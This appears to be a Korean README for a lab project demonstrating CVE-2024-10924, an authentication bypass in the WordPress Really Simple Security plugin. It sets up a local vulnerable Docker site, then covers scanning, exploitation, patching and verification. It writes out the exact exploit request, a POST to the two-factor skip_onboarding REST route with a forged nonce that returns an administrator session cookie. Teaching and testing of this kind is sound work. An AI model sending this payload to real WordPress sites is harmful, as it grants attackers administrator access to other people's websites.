
CVE-2024-10924의 악용 및 완화 방법을 시연하며, WordPress Really Simple Security의 인증 우회 취약점을 자동화된 Python 익스플로잇, 수동 Burp Suite 절차, 패치 검증을 통해 다룹니다.
개요
이 프로젝트는 WordPress "Really Simple Security" 플러그인의 치명적인 인증 우회 취약점인 CVE-2024-10924의 악용 및 완화를 시연합니다.
1단계: 환경 설정
취약한 WordPress 환경을 시작합니다: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
컨테이너가 실행 중인지 확인합니다: docker ps
WordPress에 접속합니다: http://localhost:1337
필요한 도구:
2단계: 취약점 스캔
대상에 대해 GVM 스캔을 실행합니다:
3단계: 악용
방법 A - 자동화된 Python 악용: python exploit.py
방법 B - 수동 Burp Suite:
http://localhost:1337로 가는 트래픽을 인터셉트합니다.
POST 요청을 전송합니다: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
관리자 세션을 포함한 Set-Cookie 헤더가 있는 응답을 확인합니다.
예상 결과:
4단계: 완화
취약한 엔드포인트를 차단하기 위해 패치를 적용합니다: .\patch.ps1
이 작업의 기능:
5단계: 검증
악용을 다시 실행합니다(방법 A 또는 B): python exploit.py
완화 후 예상 결과:
추가 참고 사항
환경을 중지하려면: docker-compose down
컨테이너 로그를 보려면: docker-compose logs -f
WordPress 관리자에 정식으로 접속하려면: http://localhost:1337/wp-admin (자격 증명은 docker-compose.yml을 확인하세요.)